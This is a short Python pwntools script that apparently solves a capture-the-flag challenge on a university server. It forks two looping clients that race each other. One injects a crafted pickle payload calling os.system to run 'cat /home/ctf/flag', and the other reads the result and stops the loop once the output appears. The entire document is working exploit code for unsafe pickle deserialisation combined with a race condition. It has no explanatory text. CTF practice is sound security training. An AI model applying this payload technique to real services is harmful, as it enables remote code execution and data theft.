38 lines
836 B
Python
38 lines
836 B
Python
from pwn import *
|
|
from os import fork, kill
|
|
|
|
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
|
|
PORT = 25653
|
|
|
|
PAYLOAD = "cat /home/ctf/flag"
|
|
|
|
pid = fork()
|
|
|
|
if pid != 0:
|
|
while True:
|
|
conn = remote(HOST, PORT)
|
|
conn.sendlineafter(b":", b"didas")
|
|
conn.sendlineafter(b">>>", b"1")
|
|
conn.sendlineafter(b">>>", b"1")
|
|
conn.sendlineafter(b":", b"bomb")
|
|
conn.recvuntil(b":")
|
|
conn.sendline(b"cos")
|
|
conn.sendline(b"system")
|
|
conn.sendline(("(S'"+PAYLOAD+"'").encode('utf-8'))
|
|
conn.sendline(b"tR.")
|
|
conn.sendline(b"\n\n\n")
|
|
conn.close()
|
|
|
|
else:
|
|
while True:
|
|
conn = remote(HOST, PORT)
|
|
conn.sendlineafter(b":", b"didas")
|
|
conn.sendlineafter(b">>>", b"0")
|
|
conn.sendlineafter(b">>>", b"0")
|
|
conn.sendlineafter(b":", b"bomb")
|
|
res = conn.recvline().decode('utf-8')
|
|
if "[ERROR]" not in res:
|
|
print(res)
|
|
kill(pid, 9)
|
|
break
|